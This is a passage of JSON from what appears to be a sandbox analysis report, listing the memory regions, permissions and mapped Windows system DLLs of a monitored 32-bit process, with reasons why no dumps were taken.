2002362367, "entry_point": 0, "filename": null, "id": "region_4607", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:34.774", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_4608", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:34.774", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_4609", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:34.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4610", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:34.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_4611", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:34.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2818047, "entry_point": 0, "filename": null, "id": "region_4612", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:01:34.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 8716288, "type": "region", "version": 1 }, "end_va": 9764863, "entry_point": 0, "filename": null, "id": "region_4613", "name": "private_0x0000000000850000", "norm_filename": null, "region_type": "private_memory", "start_va": 8716288, "timestamp": "00:01:34.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787932671, "entry_point": 1786975182, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_4614", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:34.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_4615", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:34.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_4616", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:34.806", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_4617", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:34.806", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1959002112, "type": "region", "version": 1 }, "end_va": 1959063551, "entry_point": 1959006881, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_4618", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1959002112, "timestamp": "00:01:34.807", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1959067648, "type": "region", "version": 1 }, "end_va": 1959104511, "entry_point": 1959073190, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_4619", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1959067648, "timestamp": "00:01:34.807", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1959133184, "type": "region", "version": 1 }, "end_va": 1959202815, "entry_point": 1959138048, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_4620", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959133184, "timestamp": "00:01:34.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1959264256, "type": "region", "version": 1 }, "end_va": 1959317503, "entry_point": 1959268832, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_4621", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959264256, "timestamp": "00:01:34.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1959329792, "type": "region", "version": 1 }, "end_va": 1959546879, "entry_point": 1959334869, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_4622", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1959329792, "timestamp": "00:01:34.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_4623", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:34.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_4624", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:34.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_4625", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:34.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_4626", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:34.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_4627", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:34.811", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_4628", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:34.811", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_4629", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:34.812", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_4630", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:34.812", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_4631", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:34.813", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_4632", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:34.813", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_4633", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:34.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_4634", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:34.814", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_4635", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:34.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_4636", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:34.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_4637", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:34.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_4638", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:34.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_4639", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:34.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_4640", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:34.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_4641", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:34.817", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4642", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:34.818", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 5734399, "entry_point": 0, "filename": null, "id": "region_4643", "name": "pagefile_0x00000000003f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4128768, "timestamp": "00:01:34.828", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4644", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:34.828", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_4645", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:34.829", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_4646", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:35.076", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_4647", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:35.076", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 1245184, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_4648", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 1245184, "timestamp": "00:01:35.076", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_4649", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:01:35.076", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_4650", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:35.076", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_4651", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:35.076", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2359295, "entry_point": 0, "filename": null, "id": "region_4652", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:01:35.076", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 2818048, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_4653", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 2818048, "timestamp": "00:01:35.077", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_4654", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:01:35.077", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6684672, "type": "region", "version": 1 }, "end_va": 8261631, "entry_point": 0, "filename": null, "id": "region_4655", "name": "pagefile_0x0000000000660000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6684672, "timestamp": "00:01:35.077", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9764864, "type": "region", "version": 1 }, "end_va": 30736383, "entry_point": 0, "filename": null, "id": "region_4656", "name": "pagefile_0x0000000000950000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9764864, "timestamp": "00:01:35.077", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 32047104, "type": "region", "version": 1 }, "end_va": 32309247, "entry_point": 0, "filename": null, "id": "region_4657", "name": "private_0x0000000001e90000", "norm_filename": null, "region_type": "private_memory", "start_va": 32047104, "timestamp": "00:01:35.077", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_4658", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:35.078", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_4659", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:35.078", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_4660", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:01:35.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1958543360, "type": "region", "version": 1 }, "end_va": 1958920191, "entry_point": 1958685512, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_4661", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1958543360, "timestamp": "00:01:35.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1958936576, "type": "region", "version": 1 }, "end_va": 1958977535, "entry_point": 1958941850, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_4662", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1958936576, "timestamp": "00:01:35.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31457280, "type": "region", "version": 1 }, "end_va": 31719423, "entry_point": 0, "filename": null, "id": "region_4663", "name": "private_0x0000000001e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 31457280, "timestamp": "00:01:35.092", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 33357823, "entry_point": 0, "filename": null, "id": "region_4664", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, "timestamp": "00:01:35.092", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1958346752, "type": "region", "version": 1 }, "end_va": 1958514687, "entry_point": 1958374169, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_4665", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1958346752, "timestamp": "00:01:35.092", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_4666", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:01:35.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, 